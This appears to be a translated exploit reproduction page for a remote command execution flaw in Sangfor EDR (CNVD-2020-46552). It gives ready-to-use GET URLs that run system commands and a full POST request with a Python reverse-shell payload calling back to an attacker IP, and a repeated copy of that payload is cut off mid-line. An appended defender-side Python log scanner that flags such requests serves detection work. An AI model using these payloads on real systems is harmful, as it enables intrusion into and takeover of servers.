Sangfor EDR Remote Command Execution CNVD-2020-46552

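Vulnerability Description

Sangfor Endpoint Detection and Response is an EDR system developed by Sangfor. By exploiting this vulnerability, an attacker can send a maliciously crafted HTTP request to the target server, gain privileges on that server, and achieve remote code execution.

Affected Versions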

Note

EDR v3.2.16
EDR v3.2.17
EDR v3.2.19

Vulnerability Reproduction

https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&limit=whoami
https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami
https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&path=whoami
https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&row=whoami


Reverse Shell

POST /tool/log/c.php HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 256

strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Simply POST the following data to /tool/log/c.php:
strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC

Original: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%20CNVD-2020-46552.html
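
A defender-side check for the requests shown above, as an added example that is not part of the original post: it scans web access logs for hits on /tool/log/c.php that carry the strip_slashes parameter. The Apache/nginx "combined" log layout, the severity labels, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter names are taken from the requests shown on this page.
TARGET_PATH = "/tool/log/c.php"
TRIGGER_PARAM = "strip_slashes"
CARRIER_PARAMS = {"host", "path", "row", "limit"}

# Assumption: logs use the Apache/nginx "combined" access-log layout.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (severity, reason) for one log line, or None if unrelated."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Decode percent-escapes and collapse duplicate slashes before comparing.
    path = re.sub(r"/+", "/", unquote(url.path))
    if path != TARGET_PATH:
        return None
    # parse_qs percent-decodes parameter names and values.
    params = parse_qs(url.query, keep_blank_values=True)
    if TRIGGER_PARAM in params:
        carriers = sorted(CARRIER_PARAMS.intersection(params))
        return ("high", f"{TRIGGER_PARAM}={params[TRIGGER_PARAM][0]!r} "
                        f"with {carriers or 'no known carrier'}")
    if m["method"] == "POST":
        # Request bodies are not written to access logs, so a POST to this
        # path cannot be cleared from the log alone.
        return ("review", "POST to log tool; body not logged")
    return ("info", "access to log tool without trigger parameter")

def scan(lines):
    """Return (line_number, severity, reason) for every matching line."""
    return [(i, *hit) for i, line in enumerate(lines, 1) if (hit := classify(line))]

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [18/Aug/2020:10:01:02 +0800] "GET /tool/log/c.php?strip_slashes=system&host=whoami HTTP/1.1" 200 312 "-" "curl/7.68.0"',
    '198.51.100.7 - - [18/Aug/2020:10:01:09 +0800] "POST /tool/log/c.php HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '203.0.113.20 - - [18/Aug/2020:10:02:00 +0800] "GET /ui/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Aug/2020:10:03:41 +0800] "GET /tool//log/c.php?%73trip_slashes=system&row=whoami HTTP/1.1" 200 298 "-" "-"',
]

if __name__ == "__main__":
    for lineno, severity, reason in scan(SAMPLE):
        print(lineno, severity, reason)
```

Because the POST variant carries its parameters in the body, access logs alone only show that the path was hit; confirming or clearing those entries needs a WAF, reverse proxy, or packet capture that records request bodies.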
